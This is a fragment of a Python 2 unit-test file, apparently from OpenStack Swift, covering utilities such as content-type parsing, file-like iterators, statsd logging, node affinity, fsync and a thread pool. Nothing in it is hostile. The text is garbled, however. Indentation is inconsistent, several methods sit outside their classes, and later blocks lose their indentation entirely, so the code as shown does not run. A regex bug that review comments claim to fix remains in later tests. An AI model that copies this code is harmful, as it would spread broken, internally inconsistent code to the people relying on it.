    class MockStat(object):
        def __init__(self, mode, dev, ino):
            self.st_mode = mode
            self.st_dev = dev
            self.st_ino = ino

    def _mock_os_lstat(path):
        if path.endswith(".."):
            return _os_lstat(path)
        else:
            parent_path = os.path.join(path, "..")
            child = _os_lstat(path)
            parent = _os_lstat(parent_path)
            # NOTE(review): dev gets parent.st_ino and ino gets
            # child.st_dev — looks transposed relative to MockStat's
            # (mode, dev, ino) signature; presumably intentional to
            # synthesize the mismatch this test needs — confirm.
            return MockStat(child.st_mode, parent.st_ino,
                            child.st_dev)

    tmpdir = mkdtemp()
    try:
        with patch("os.lstat", _mock_os_lstat):
            try:
                utils.ismount(tmpdir)
            except OSError:
                self.fail("Unexpected exception")
            else:
                pass
    finally:
        shutil.rmtree(tmpdir)
def test_parse_content_type(self):
    # parse_content_type() returns (type, [(attr, value), ...]),
    # preserving quoting/escapes and tolerating valueless attrs.
    self.assertEquals(utils.parse_content_type('text/plain'),
                      ('text/plain', []))
    self.assertEquals(utils.parse_content_type('text/plain;charset=utf-8'),
                      ('text/plain', [('charset', 'utf-8')]))
    self.assertEquals(
        utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
        ('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
    self.assertEquals(
        utils.parse_content_type('text/plain; hello="world"; a=b'),
        ('text/plain', [('hello', '"world"'), ('a', 'b')]))
    self.assertEquals(
        utils.parse_content_type(r'text/plain; x="\""; a=b'),
        ('text/plain', [('x', r'"\""'), ('a', 'b')]))
    self.assertEquals(
        utils.parse_content_type(r'text/plain; x; a=b'),
        ('text/plain', [('x', ''), ('a', 'b')]))
    self.assertEquals(
        utils.parse_content_type(r'text/plain; x="\""; a'),
        ('text/plain', [('x', r'"\""'), ('a', '')]))
class TestFileLikeIter(unittest.TestCase):
    """Tests for utils.FileLikeIter, a file-like wrapper over an iterable
    of chunks: iteration, next(), read/readline/readlines (with and
    without size limits), and close() semantics."""

    def test_iter_file_iter(self):
        # iterating the wrapper yields the underlying chunks unchanged
        in_iter = ['abc', 'de', 'fghijk', 'l']
        chunks = []
        for chunk in utils.FileLikeIter(in_iter):
            chunks.append(chunk)
        self.assertEquals(chunks, in_iter)

    def test_next(self):
        in_iter = ['abc', 'de', 'fghijk', 'l']
        chunks = []
        iter_file = utils.FileLikeIter(in_iter)
        while True:
            try:
                chunk = iter_file.next()
            except StopIteration:
                break
            chunks.append(chunk)
        self.assertEquals(chunks, in_iter)

    def test_read(self):
        # read() with no size consumes and joins everything
        in_iter = ['abc', 'de', 'fghijk', 'l']
        iter_file = utils.FileLikeIter(in_iter)
        self.assertEquals(iter_file.read(), ''.join(in_iter))

    def test_read_with_size(self):
        # read(2) never returns more than 2 bytes and eventually
        # reassembles the full input
        in_iter = ['abc', 'de', 'fghijk', 'l']
        chunks = []
        iter_file = utils.FileLikeIter(in_iter)
        while True:
            chunk = iter_file.read(2)
            if not chunk:
                break
            self.assertTrue(len(chunk) <= 2)
            chunks.append(chunk)
        self.assertEquals(''.join(chunks), ''.join(in_iter))

    def test_read_with_size_zero(self):
        # makes little sense, but file supports it, so...
        self.assertEquals(utils.FileLikeIter('abc').read(0), '')

    def test_readline(self):
        # lines split on '\n' regardless of where chunk boundaries fall
        in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
        lines = []
        iter_file = utils.FileLikeIter(in_iter)
        while True:
            line = iter_file.readline()
            if not line:
                break
            lines.append(line)
        self.assertEquals(
            lines,
            [v if v == 'trailing.' else v + '\n'
             for v in ''.join(in_iter).split('\n')])

    def test_readline2(self):
        self.assertEquals(
            utils.FileLikeIter(['abc', 'def\n']).readline(4),
            'abcd')

    def test_readline3(self):
        self.assertEquals(
            utils.FileLikeIter(['a' * 1111, 'bc\ndef']).readline(),
            ('a' * 1111) + 'bc\n')

    def test_readline_with_size(self):
        in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
        lines = []
        iter_file = utils.FileLikeIter(in_iter)
        while True:
            line = iter_file.readline(2)
            if not line:
                break
            lines.append(line)
        self.assertEquals(
            lines,
            ['ab', 'c\n', 'd\n', 'ef', 'g\n', 'h\n', 'ij', '\n', '\n', 'k\n',
             'tr', 'ai', 'li', 'ng', '.'])

    def test_readlines(self):
        in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
        lines = utils.FileLikeIter(in_iter).readlines()
        self.assertEquals(
            lines,
            [v if v == 'trailing.' else v + '\n'
             for v in ''.join(in_iter).split('\n')])

    def test_readlines_with_size(self):
        in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
        iter_file = utils.FileLikeIter(in_iter)
        lists_of_lines = []
        while True:
            lines = iter_file.readlines(2)
            if not lines:
                break
            lists_of_lines.append(lines)
        self.assertEquals(
            lists_of_lines,
            [['ab'], ['c\n'], ['d\n'], ['ef'], ['g\n'], ['h\n'], ['ij'],
             ['\n', '\n'], ['k\n'], ['tr'], ['ai'], ['li'], ['ng'], ['.']])

    def test_close(self):
        # after close(), all read operations must raise ValueError
        iter_file = utils.FileLikeIter('abcdef')
        self.assertEquals(iter_file.next(), 'a')
        iter_file.close()
        # BUG FIX: was assertTrue(iter_file.closed, True) — the second
        # positional argument of assertTrue is *msg*, not an expected
        # value, so 'True' was silently used as a failure message.
        self.assertTrue(iter_file.closed)
        self.assertRaises(ValueError, iter_file.next)
        self.assertRaises(ValueError, iter_file.read)
        self.assertRaises(ValueError, iter_file.readline)
        self.assertRaises(ValueError, iter_file.readlines)
        # Just make sure repeated close calls don't raise an Exception
        iter_file.close()
        self.assertTrue(iter_file.closed)
class TestStatsdLogging(unittest.TestCase):
    # White-box tests for the StatsdClient wired into utils.get_logger():
    # construction from config, prefix handling, sampling, and the
    # timing_stats decorator.  These reach into private attributes
    # (_host, _prefix, ...) on purpose.

    def test_get_logger_statsd_client_not_specified(self):
        logger = utils.get_logger({}, 'some-name', log_route='some-route')
        # white-box construction validation
        self.assertEqual(None, logger.logger.statsd_client)

    def test_get_logger_statsd_client_defaults(self):
        # only log_statsd_host set: port/sample-rate fall back to
        # 8125 / 1, and the logger name becomes the metric prefix
        logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
                                  'some-name', log_route='some-route')
        # white-box construction validation
        self.assert_(isinstance(logger.logger.statsd_client,
                                utils.StatsdClient))
        self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
        self.assertEqual(logger.logger.statsd_client._port, 8125)
        self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
        self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)

        logger.set_statsd_prefix('some-name.more-specific')
        self.assertEqual(logger.logger.statsd_client._prefix,
                         'some-name.more-specific.')
        logger.set_statsd_prefix('')
        self.assertEqual(logger.logger.statsd_client._prefix, '')

    def test_get_logger_statsd_client_non_defaults(self):
        # every statsd config knob overridden; metric_prefix is
        # prepended before the logger name
        logger = utils.get_logger({
            'log_statsd_host': 'another.host.com',
            'log_statsd_port': '9876',
            'log_statsd_default_sample_rate': '0.75',
            'log_statsd_sample_rate_factor': '0.81',
            'log_statsd_metric_prefix': 'tomato.sauce',
        }, 'some-name', log_route='some-route')
        self.assertEqual(logger.logger.statsd_client._prefix,
                         'tomato.sauce.some-name.')
        logger.set_statsd_prefix('some-name.more-specific')
        self.assertEqual(logger.logger.statsd_client._prefix,
                         'tomato.sauce.some-name.more-specific.')
        logger.set_statsd_prefix('')
        self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
        self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
        self.assertEqual(logger.logger.statsd_client._port, 9876)
        self.assertEqual(logger.logger.statsd_client._default_sample_rate,
                         0.75)
        self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
                         0.81)

    def test_sample_rates(self):
        # control the RNG: just above the sample rate -> dropped,
        # just below -> sent with a |@rate suffix
        logger = utils.get_logger({'log_statsd_host': 'some.host.com'})

        mock_socket = MockUdpSocket()
        # encapsulation? what's that?
        statsd_client = logger.logger.statsd_client
        self.assertTrue(statsd_client.random is random.random)

        statsd_client._open_socket = lambda *_: mock_socket
        statsd_client.random = lambda: 0.50001

        logger.increment('tribbles', sample_rate=0.5)
        self.assertEqual(len(mock_socket.sent), 0)

        statsd_client.random = lambda: 0.49999
        logger.increment('tribbles', sample_rate=0.5)
        self.assertEqual(len(mock_socket.sent), 1)

        payload = mock_socket.sent[0][0]
        self.assertTrue(payload.endswith("|@0.5"))

    def test_sample_rates_with_sample_rate_factor(self):
        # the effective rate is default_sample_rate * sample_rate_factor
        logger = utils.get_logger({
            'log_statsd_host': 'some.host.com',
            'log_statsd_default_sample_rate': '0.82',
            'log_statsd_sample_rate_factor': '0.91',
        })
        effective_sample_rate = 0.82 * 0.91

        mock_socket = MockUdpSocket()
        # encapsulation? what's that?
        statsd_client = logger.logger.statsd_client
        self.assertTrue(statsd_client.random is random.random)

        statsd_client._open_socket = lambda *_: mock_socket
        statsd_client.random = lambda: effective_sample_rate + 0.001

        logger.increment('tribbles')
        self.assertEqual(len(mock_socket.sent), 0)

        statsd_client.random = lambda: effective_sample_rate - 0.001
        logger.increment('tribbles')
        self.assertEqual(len(mock_socket.sent), 1)

        payload = mock_socket.sent[0][0]
        self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
                        payload)

        # a per-call sample_rate is also multiplied by the factor
        effective_sample_rate = 0.587 * 0.91
        statsd_client.random = lambda: effective_sample_rate - 0.001
        logger.increment('tribbles', sample_rate=0.587)
        self.assertEqual(len(mock_socket.sent), 2)

        payload = mock_socket.sent[1][0]
        self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
                        payload)

    def test_timing_stats(self):
        # the timing_stats decorator reports '<func>.timing' for
        # 2xx/404/412/416-style "success" statuses and
        # '<func>.errors.timing' otherwise (401 here)
        class MockController(object):
            def __init__(self, status):
                self.status = status
                self.logger = self
                self.args = ()
                self.called = 'UNKNOWN'

            def timing_since(self, *args):
                self.called = 'timing'
                self.args = args

        @utils.timing_stats()
        def METHOD(controller):
            return Response(status=controller.status)

        mock_controller = MockController(200)
        METHOD(mock_controller)
        self.assertEquals(mock_controller.called, 'timing')
        self.assertEquals(len(mock_controller.args), 2)
        self.assertEquals(mock_controller.args[0], 'METHOD.timing')
        self.assert_(mock_controller.args[1] > 0)

        mock_controller = MockController(404)
        METHOD(mock_controller)
        self.assertEquals(len(mock_controller.args), 2)
        self.assertEquals(mock_controller.called, 'timing')
        self.assertEquals(mock_controller.args[0], 'METHOD.timing')
        self.assert_(mock_controller.args[1] > 0)

        mock_controller = MockController(401)
        METHOD(mock_controller)
        self.assertEquals(len(mock_controller.args), 2)
        self.assertEquals(mock_controller.called, 'timing')
        self.assertEquals(mock_controller.args[0], 'METHOD.errors.timing')
        self.assert_(mock_controller.args[1] > 0)
class UnsafeXrange(object):
    """
    Like xrange(limit), but with extra context switching to screw things up.
    """
    # Raises ValueError if two greenthreads are ever inside next() at
    # the same time; the eventlet.sleep() yield makes that collision
    # near-certain without GreenthreadSafeIterator protection.

    def __init__(self, upper_bound):
        self.current = 0
        self.concurrent_calls = 0
        self.upper_bound = upper_bound

    def __iter__(self):
        return self

    def next(self):
        if self.concurrent_calls > 0:
            # NOTE(review): the '%r' here is never %-formatted, so the
            # message prints a literal '(%r)' — presumably a leftover
            # from a dropped format argument; confirm before relying
            # on the message text.
            raise ValueError("concurrent access is bad, mmmkay? (%r)")

        self.concurrent_calls += 1
        try:
            if self.current >= self.upper_bound:
                raise StopIteration
            else:
                val = self.current
                self.current += 1
                eventlet.sleep()   # yield control
                return val
        finally:
            self.concurrent_calls -= 1
class TestAffinityKeyFunction(unittest.TestCase):
    # affinity_key_function() parses "rN[zM]=priority" specs into a
    # sort key; lower priority sorts first, unmatched nodes keep
    # their relative order at the end.

    def setUp(self):
        self.nodes = [dict(id=0, region=1, zone=1),
                      dict(id=1, region=1, zone=2),
                      dict(id=2, region=2, zone=1),
                      dict(id=3, region=2, zone=2),
                      dict(id=4, region=3, zone=1),
                      dict(id=5, region=3, zone=2),
                      dict(id=6, region=4, zone=0),
                      dict(id=7, region=4, zone=1)]

    def test_single_region(self):
        keyfn = utils.affinity_key_function("r3=1")
        ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
        self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)

    def test_bogus_value(self):
        # missing '=' and non-numeric priority are both rejected
        self.assertRaises(ValueError,
                          utils.affinity_key_function, "r3")
        self.assertRaises(ValueError,
                          utils.affinity_key_function, "r3=elephant")

    def test_empty_value(self):
        # Empty's okay, it just means no preference
        keyfn = utils.affinity_key_function("")
        self.assert_(callable(keyfn))
        ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
        self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)

    def test_all_whitespace_value(self):
        # Empty's okay, it just means no preference
        keyfn = utils.affinity_key_function(" \n")
        self.assert_(callable(keyfn))
        ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
        self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)

    def test_with_zone_zero(self):
        # zone 0 must not be confused with "no zone given"
        keyfn = utils.affinity_key_function("r4z0=1")
        ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
        self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)

    def test_multiple(self):
        keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
        ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
        self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)

    def test_more_specific_after_less_specific(self):
        # r2z2=50 (more specific) wins over r2=100 for node 3
        keyfn = utils.affinity_key_function("r2=100, r2z2=50")
        ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
        self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
    # affinity_locality_predicate() parses "rN[zM], ..." specs into a
    # membership predicate over nodes (None for the empty spec).

    def setUp(self):
        self.nodes = [dict(id=0, region=1, zone=1),
                      dict(id=1, region=1, zone=2),
                      dict(id=2, region=2, zone=1),
                      dict(id=3, region=2, zone=2),
                      dict(id=4, region=3, zone=1),
                      dict(id=5, region=3, zone=2),
                      dict(id=6, region=4, zone=0),
                      dict(id=7, region=4, zone=1)]

    def test_empty(self):
        pred = utils.affinity_locality_predicate('')
        self.assert_(pred is None)

    def test_region(self):
        pred = utils.affinity_locality_predicate('r1')
        self.assert_(callable(pred))
        ids = [n['id'] for n in self.nodes if pred(n)]
        self.assertEqual([0, 1], ids)

    def test_zone(self):
        pred = utils.affinity_locality_predicate('r1z1')
        self.assert_(callable(pred))
        ids = [n['id'] for n in self.nodes if pred(n)]
        self.assertEqual([0], ids)

    def test_multiple(self):
        # comma-separated specs OR together
        pred = utils.affinity_locality_predicate('r1, r3, r4z0')
        self.assert_(callable(pred))
        ids = [n['id'] for n in self.nodes if pred(n)]
        self.assertEqual([0, 1, 4, 5, 6], ids)

    def test_invalid(self):
        # garbage, bad zone char, trailing junk, and '=priority'
        # (key-function syntax) are all rejected here
        self.assertRaises(ValueError,
                          utils.affinity_locality_predicate, 'falafel')
        self.assertRaises(ValueError,
                          utils.affinity_locality_predicate, 'r8zQ')
        self.assertRaises(ValueError,
                          utils.affinity_locality_predicate, 'r2d2')
        self.assertRaises(ValueError,
                          utils.affinity_locality_predicate, 'r1z1=1')
class TestGreenthreadSafeIterator(unittest.TestCase):
    # Proves that GreenthreadSafeIterator serializes access to a
    # non-greenthread-safe iterator (UnsafeXrange above).

    def increment(self, iterable):
        plus_ones = []
        for n in iterable:
            plus_ones.append(n + 1)
        return plus_ones

    def test_setup_works(self):
        # it should work without concurrent access
        self.assertEquals([0, 1, 2, 3], list(UnsafeXrange(4)))

        # sanity: without the safe wrapper, two greenthreads sharing
        # the iterator must trip UnsafeXrange's ValueError
        iterable = UnsafeXrange(10)
        pile = eventlet.GreenPile(2)
        for _ in xrange(2):
            pile.spawn(self.increment, iterable)

        try:
            # consume the pile; result is discarded — we only care
            # whether the expected ValueError fires
            sorted([resp for resp in pile])
            self.assertTrue(False, "test setup is insufficiently crazy")
        except ValueError:
            pass

    def test_access_is_serialized(self):
        pile = eventlet.GreenPile(2)
        iterable = utils.GreenthreadSafeIterator(UnsafeXrange(10))
        for _ in xrange(2):
            pile.spawn(self.increment, iterable)
        response = sorted(sum([resp for resp in pile], []))
        self.assertEquals(range(1, 11), response)
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
    # Bind a real UDP socket on an ephemeral port and drain it from a
    # daemon thread into self.queue, so tests can assert on the actual
    # statsd packets the logger emits.
    self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    self.sock.bind(('localhost', 0))
    self.port = self.sock.getsockname()[1]
    self.queue = Queue()
    self.reader_thread = threading.Thread(target=self.statsd_reader)
    self.reader_thread.setDaemon(1)
    self.reader_thread.start()
def tearDown(self):
    # The "no-op when disabled" test doesn't set up a real logger, so
    # create one here so we can tell the reader thread to stop.
    if not getattr(self, 'logger', None):
        self.logger = utils.get_logger({
            'log_statsd_host': 'localhost',
            'log_statsd_port': str(self.port),
        }, 'some-name')
    # 'STOP' is the sentinel statsd_reader() exits on
    self.logger.increment('STOP')
    self.reader_thread.join(timeout=4)
    self.sock.close()
    del self.logger
def statsd_reader(self):
    # Runs in the daemon thread: forward every received statsd packet
    # to self.queue until a 'STOP' sentinel packet arrives.
    while True:
        try:
            payload = self.sock.recv(4096)
            if payload and 'STOP' in payload:
                return 42    # we are the expected termination
            self.queue.put(payload)
        except Exception, e:
            sys.stderr.write('statsd_reader thread: %r' % (e,))
            break
def _send_and_get(self, sender_fn, *args, **kwargs):
    """
    Because the client library may not actually send a packet with
    sample_rate < 1, we keep trying until we get one through.
    """
    got = None
    while not got:
        sender_fn(*args, **kwargs)
        try:
            # short timeout per attempt; loop retries the send
            got = self.queue.get(timeout=0.5)
        except Empty:
            pass
    return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
    # assert the emitted statsd payload equals `expected` exactly
    got = self._send_and_get(sender_fn, *args, **kwargs)
    return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
    # assert the emitted statsd payload matches the regexp (re.search)
    got = self._send_and_get(sender_fn, *args, **kwargs)
    return self.assert_(re.search(expected_regexp, got),
                        [got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
    # Without log_statsd_host, every delegate method returns None and
    # sends no UDP traffic at all.
    logger = utils.get_logger({
        # No "log_statsd_host" means "disabled"
        'log_statsd_port': str(self.port),
    }, 'some-name')
    # Delegate methods are no-ops
    self.assertEqual(None, logger.update_stats('foo', 88))
    self.assertEqual(None, logger.update_stats('foo', 88, 0.57))
    self.assertEqual(None, logger.update_stats('foo', 88,
                                               sample_rate=0.61))
    self.assertEqual(None, logger.increment('foo'))
    self.assertEqual(None, logger.increment('foo', 0.57))
    self.assertEqual(None, logger.increment('foo', sample_rate=0.61))
    self.assertEqual(None, logger.decrement('foo'))
    self.assertEqual(None, logger.decrement('foo', 0.57))
    self.assertEqual(None, logger.decrement('foo', sample_rate=0.61))
    self.assertEqual(None, logger.timing('foo', 88.048))
    self.assertEqual(None, logger.timing('foo', 88.57, 0.34))
    self.assertEqual(None, logger.timing('foo', 88.998, sample_rate=0.82))
    self.assertEqual(None, logger.timing_since('foo', 8938))
    self.assertEqual(None, logger.timing_since('foo', 8948, 0.57))
    self.assertEqual(None, logger.timing_since('foo', 849398,
                                               sample_rate=0.61))
    # Now, the queue should be empty (no UDP packets sent)
    self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
    # With no default sample rate configured, counters/timers carry no
    # '|@rate' suffix; a per-call sample_rate (keyword or positional)
    # adds one.
    self.logger = utils.get_logger({
        'log_statsd_host': 'localhost',
        'log_statsd_port': str(self.port),
    }, 'some-name')
    self.assertStat('some-name.some.counter:1|c', self.logger.increment,
                    'some.counter')
    self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
                    'some.counter')
    self.assertStat('some-name.some.operation:4900.0|ms',
                    self.logger.timing, 'some.operation', 4.9 * 1000)
    self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
                           self.logger.timing_since, 'another.operation',
                           time.time())
    self.assertStat('some-name.another.counter:42|c',
                    self.logger.update_stats, 'another.counter', 42)

    # Each call can override the sample_rate (also, bonus prefix test)
    self.logger.set_statsd_prefix('pfx')
    self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
                    'some.counter', sample_rate=0.972)
    self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
                    'some.counter', sample_rate=0.972)
    self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
                    self.logger.timing, 'some.operation', 4.9 * 1000,
                    sample_rate=0.972)
    # BUG FIX: this pattern used to end '\|ms|@0.972' — the unescaped
    # '|' made it a regex *alternation*, so the sample-rate suffix was
    # never actually checked.  '|' and '.' are now escaped.
    self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms\|@0\.972',
                           self.logger.timing_since, 'another.op',
                           time.time(), sample_rate=0.972)
    self.assertStat('pfx.another.counter:3|c|@0.972',
                    self.logger.update_stats, 'another.counter', 3,
                    sample_rate=0.972)

    # Can override sample_rate with non-keyword arg
    self.logger.set_statsd_prefix('')
    self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
                    'some.counter', 0.939)
    self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
                    'some.counter', 0.939)
    self.assertStat('some.operation:4900.0|ms|@0.939',
                    self.logger.timing, 'some.operation',
                    4.9 * 1000, 0.939)
    # BUG FIX: same unescaped-alternation defect as above.
    self.assertStatMatches('another\.op:\d+\.\d+\|ms\|@0\.939',
                           self.logger.timing_since, 'another.op',
                           time.time(), 0.939)
    self.assertStat('another.counter:3|c|@0.939',
                    self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
    def test_get_valid_utf8_str(self):
        # Two Hangul syllables as the unicode sample.
        unicode_sample = u'\uc77c\uc601'
        valid_utf8_str = unicode_sample.encode('utf-8')
        # Reversing the UTF-8 byte sequence produces invalid UTF-8.
        invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
        # Already-valid bytes and unicode both come back as UTF-8 bytes.
        self.assertEquals(valid_utf8_str,
                          utils.get_valid_utf8_str(valid_utf8_str))
        self.assertEquals(valid_utf8_str,
                          utils.get_valid_utf8_str(unicode_sample))
        # Invalid sequences are replaced with U+FFFD, here spelled as raw
        # UTF-8 bytes (Python 2 era byte-string literal).
        self.assertEquals('\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
                          utils.get_valid_utf8_str(invalid_utf8_str))
def test_thread_locals(self):
logger = utils.get_logger(None)
orig_thread_locals = logger.thread_locals
try:
self.assertEquals(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEquals(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEquals(logger.thread_locals, ('5678', '5.6.7.8'))
finally:
logger.thread_locals = orig_thread_locals
def test_no_fdatasync(self):
called = []
class NoFdatasync:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync:
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEquals(called, [12345])
    def test_fsync_bad_fullsync(self):
        # A failing F_FULLSYNC fcntl call must surface from utils.fsync as
        # OSError.
        class FCNTL:
            F_FULLSYNC = 123

            def fcntl(self, fd, op):
                # NOTE(review): IOError(18) sets args, not errno; presumably
                # utils.fsync only cares that the call raised — confirm.
                raise IOError(18)
        with patch('swift.common.utils.fcntl', FCNTL()):
            self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL:
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEquals(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL:
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEquals(called, [12345])
class TestThreadpool(unittest.TestCase):
    """Behaviour of utils.ThreadPool with one worker vs. zero workers."""

    def _thread_id(self):
        # Identify the thread a callable actually executes on.
        return threading.current_thread().ident

    def _capture_args(self, *args, **kwargs):
        return {'args': args, 'kwargs': kwargs}

    def _raise_valueerror(self):
        # int() of a non-numeric string always raises ValueError.
        return int('fishcakes')

    def test_run_in_thread_with_threads(self):
        pool = utils.ThreadPool(1)
        # Work is shipped to a worker, so it runs on a different thread.
        self.assertNotEqual(self._thread_id(),
                            pool.run_in_thread(self._thread_id))
        captured = pool.run_in_thread(self._capture_args, 1, 2, bert='ernie')
        self.assertEqual(captured,
                         {'args': (1, 2), 'kwargs': {'bert': 'ernie'}})
        # Exceptions raised in the worker propagate to the caller.
        self.assertRaises(ValueError, pool.run_in_thread,
                          self._raise_valueerror)

    def test_force_run_in_thread_with_threads(self):
        # with nthreads > 0, force_run_in_thread looks just like run_in_thread
        pool = utils.ThreadPool(1)
        self.assertNotEqual(self._thread_id(),
                            pool.force_run_in_thread(self._thread_id))
        captured = pool.force_run_in_thread(self._capture_args, 1, 2,
                                            bert='ernie')
        self.assertEqual(captured,
                         {'args': (1, 2), 'kwargs': {'bert': 'ernie'}})
        self.assertRaises(ValueError, pool.force_run_in_thread,
                          self._raise_valueerror)

    def test_run_in_thread_without_threads(self):
        # with zero threads, run_in_thread doesn't actually do so
        pool = utils.ThreadPool(0)
        self.assertEqual(self._thread_id(),
                         pool.run_in_thread(self._thread_id))
        captured = pool.run_in_thread(self._capture_args, 1, 2, bert='ernie')
        self.assertEqual(captured,
                         {'args': (1, 2), 'kwargs': {'bert': 'ernie'}})
        self.assertRaises(ValueError, pool.run_in_thread,
                          self._raise_valueerror)

